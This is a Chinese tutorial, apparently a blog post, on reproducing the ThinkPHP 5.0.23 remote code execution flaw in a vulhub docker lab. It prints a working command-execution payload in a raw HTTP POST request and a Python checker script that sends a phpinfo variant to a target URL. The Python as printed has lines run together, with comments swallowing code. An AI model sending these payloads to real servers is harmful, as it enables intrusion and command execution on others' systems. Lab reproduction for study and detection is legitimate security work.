Python武器库开发-武器库篇之ThinkPHP 5.0.23-RCE 漏洞复现(六十四)

2024-06-23 20:28

本文主要是介绍Python武器库开发-武器库篇之ThinkPHP 5.0.23-RCE 漏洞复现(六十四),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

Python武器库开发-武器库篇之ThinkPHP 5.0.23-RCE 漏洞复现(六十四)

漏洞环境搭建

这里我们使用Kali虚拟机安装docker并搭建vulhub靶场来进行ThinkPHP漏洞环境的安装,我们进入 ThinkPHP漏洞环境,可以 cd ThinkPHP,然后通过 ls 查看可以搭建的靶场,目前 vulhub关于 ThinkPHP漏洞。可以搭建的靶场有五个。我们拿 5.0.23-rce 漏洞举例,如果我们想要安装 5.0.23-rce 漏洞环境,可以 cd 到 5.0.23-rce ,然后输入以下命令启动靶场环境:

docker-compose up -d

在这里插入图片描述

然后我们在浏览器输入 https://localhost:8081就可以访问靶场环境

在这里插入图片描述

ThinkPHP5.0.23-RCE漏洞原理

ThinkPHP5.0.23-RCE漏洞是一种远程代码执行漏洞,存在于ThinkPHP框架的5.0.23版本及之前的版本中。该漏洞的原理是在TP5的路由解析过程中,由于未对用户输入进行足够的过滤,导致恶意用户可以构造特定的URL请求来执行任意的PHP代码。

具体来说,漏洞的原理如下:

  1. 在TP5中,路由解析过程中会将URL中的参数进行解析,并根据解析结果调用相应的控制器方法。

  2. 在解析URL参数时,TP5通过分析URL中的冒号(:)和斜杠(/)来确定控制器和方法的名称。

  3. 由于未对用户输入进行足够的过滤,恶意用户可以通过在URL中注入特定的代码来构造恶意请求。

  4. 恶意用户可以通过在URL中使用特殊字符(如冒号和斜杠)来改变URL参数的解析结果,从而执行任意的PHP代码。

  5. 当恶意用户构造的恶意请求被TP5解析时,解析结果可能会将恶意代码作为控制器或方法的名称,导致恶意代码被执行。

通过利用这个漏洞,攻击者可以执行任意的PHP代码,包括但不限于删除、修改、上传文件等恶意操作,进而对系统进行攻击或者获取系统敏感信息。

其POC如下所示:
url:/index.php?s=captcha
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

ThinkPHP 5.0.23-RCE漏洞POC

接下来我们给出ThinkPHP 5.0.23-RCE漏洞的POC,代码内容如下:

POST /index.php?s=captcha HTTP/1.1
Host: host:8081
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

我们通过BP抓包发送数据,得到相应的回显。

在这里插入图片描述

ThinkPHP 5.0.23-RCE漏洞POC编写

现在我们用python编写检测ThinkPHP 5.0.23-RCE漏洞的代码,内容如下:

#!/usr/bin/env pythonimport requests
from urllib.parse import urljoin
# from bs4 import BeautifulSoupdef thinkphp_5023_rce(url):# url = url+'/index.php?s=captcha'# print(url)# payload = r'_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1'# headers = {#     'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0',#     'Content-Type': 'application/x-www-form-urlencoded',#   }payload = {'_method':'__construct','filter[]':'phpinfo','method':'get','server[REQUEST_METHOD]':'1'}target = urljoin(url,'/index.php?s=captcha')# print(target)response = requests.post(target,data=payload,verify=False)print(response.text)if 'PHP Version' in response.text:print("漏洞存在")else:print("漏洞不存在")if __name__ == '__main__':url = 'http://localhost:8081'thinkphp_5023_rce(url)           

POC代码详细分析

这段代码是一个用于检测ThinkPHP 5.0.23版本远程代码执行漏洞的脚本。下面是对代码的分析:

  1. 导入requests模块和urllib.parse模块的urljoin函数。
  2. 定义了一个名为thinkphp_5023_rce的函数,接受一个参数url作为目标网站的URL。
  3. 构造了一个payload字典,包含了需要发送的POST请求的参数。
  4. 使用urljoin函数将目标网站的URL与特定的路径拼接成新的URL。
  5. 使用requests.post发送POST请求,将目标URL和payload作为参数,设置verify为False表示不验证SSL证书。
  6. 打印响应的文本内容。
  7. 判断响应的文本内容中是否包含"PHP Version",如果包含则表示漏洞存在,否则表示漏洞不存在。
  8. 在主函数中指定目标网站的URL,并调用thinkphp_5023_rce函数。

该代码是一个简单的脚本,用于检测ThinkPHP 5.0.23版本存在的远程代码执行漏洞。它发送一个POST请求并检查响应的文本内容中是否包含特定的关键字来确定漏洞是否存在。

运行效果图

如下是我们这串代码的实际运行效果图:

在这里插入图片描述

这篇关于Python武器库开发-武器库篇之ThinkPHP 5.0.23-RCE 漏洞复现(六十四)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1088190

相关文章

这15个Vue指令,让你的项目开发爽到爆

1. V-Hotkey 仓库地址: github.com/Dafrok/v-ho… Demo: 戳这里 https://dafrok.github.io/v-hotkey 安装: npm install --save v-hotkey 这个指令可以给组件绑定一个或多个快捷键。你想要通过按下 Escape 键后隐藏某个组件,按住 Control 和回车键再显示它吗?小菜一碟: <template

python: 多模块(.py)中全局变量的导入

文章目录 global关键字可变类型和不可变类型数据的内存地址单模块(单个py文件)的全局变量示例总结 多模块(多个py文件)的全局变量from x import x导入全局变量示例 import x导入全局变量示例 总结 global关键字 global 的作用范围是模块(.py)级别: 当你在一个模块(文件)中使用 global 声明变量时,这个变量只在该模块的全局命名空

Hadoop企业开发案例调优场景

需求 (1)需求:从1G数据中,统计每个单词出现次数。服务器3台,每台配置4G内存,4核CPU,4线程。 (2)需求分析: 1G / 128m = 8个MapTask;1个ReduceTask;1个mrAppMaster 平均每个节点运行10个 / 3台 ≈ 3个任务(4    3    3) HDFS参数调优 (1)修改:hadoop-env.sh export HDFS_NAMENOD

嵌入式QT开发:构建高效智能的嵌入式系统

摘要: 本文深入探讨了嵌入式 QT 相关的各个方面。从 QT 框架的基础架构和核心概念出发,详细阐述了其在嵌入式环境中的优势与特点。文中分析了嵌入式 QT 的开发环境搭建过程,包括交叉编译工具链的配置等关键步骤。进一步探讨了嵌入式 QT 的界面设计与开发,涵盖了从基本控件的使用到复杂界面布局的构建。同时也深入研究了信号与槽机制在嵌入式系统中的应用,以及嵌入式 QT 与硬件设备的交互,包括输入输出设

OpenHarmony鸿蒙开发( Beta5.0)无感配网详解

1、简介 无感配网是指在设备联网过程中无需输入热点相关账号信息,即可快速实现设备配网,是一种兼顾高效性、可靠性和安全性的配网方式。 2、配网原理 2.1 通信原理 手机和智能设备之间的信息传递,利用特有的NAN协议实现。利用手机和智能设备之间的WiFi 感知订阅、发布能力,实现了数字管家应用和设备之间的发现。在完成设备间的认证和响应后,即可发送相关配网数据。同时还支持与常规Sof

活用c4d官方开发文档查询代码

当你问AI助手比如豆包,如何用python禁止掉xpresso标签时候,它会提示到 这时候要用到两个东西。https://developers.maxon.net/论坛搜索和开发文档 比如这里我就在官方找到正确的id描述 然后我就把参数标签换过来

【Python编程】Linux创建虚拟环境并配置与notebook相连接

1.创建 使用 venv 创建虚拟环境。例如,在当前目录下创建一个名为 myenv 的虚拟环境: python3 -m venv myenv 2.激活 激活虚拟环境使其成为当前终端会话的活动环境。运行: source myenv/bin/activate 3.与notebook连接 在虚拟环境中,使用 pip 安装 Jupyter 和 ipykernel: pip instal

安卓链接正常显示,ios#符被转义%23导致链接访问404

原因分析: url中含有特殊字符 中文未编码 都有可能导致URL转换失败,所以需要对url编码处理  如下: guard let allowUrl = webUrl.addingPercentEncoding(withAllowedCharacters: .urlQueryAllowed) else {return} 后面发现当url中有#号时,会被误伤转义为%23,导致链接无法访问

【机器学习】高斯过程的基本概念和应用领域以及在python中的实例

引言 高斯过程(Gaussian Process,简称GP)是一种概率模型,用于描述一组随机变量的联合概率分布,其中任何一个有限维度的子集都具有高斯分布 文章目录 引言一、高斯过程1.1 基本定义1.1.1 随机过程1.1.2 高斯分布 1.2 高斯过程的特性1.2.1 联合高斯性1.2.2 均值函数1.2.3 协方差函数(或核函数) 1.3 核函数1.4 高斯过程回归(Gauss

【学习笔记】 陈强-机器学习-Python-Ch15 人工神经网络(1)sklearn

系列文章目录 监督学习:参数方法 【学习笔记】 陈强-机器学习-Python-Ch4 线性回归 【学习笔记】 陈强-机器学习-Python-Ch5 逻辑回归 【课后题练习】 陈强-机器学习-Python-Ch5 逻辑回归(SAheart.csv) 【学习笔记】 陈强-机器学习-Python-Ch6 多项逻辑回归 【学习笔记 及 课后题练习】 陈强-机器学习-Python-Ch7 判别分析 【学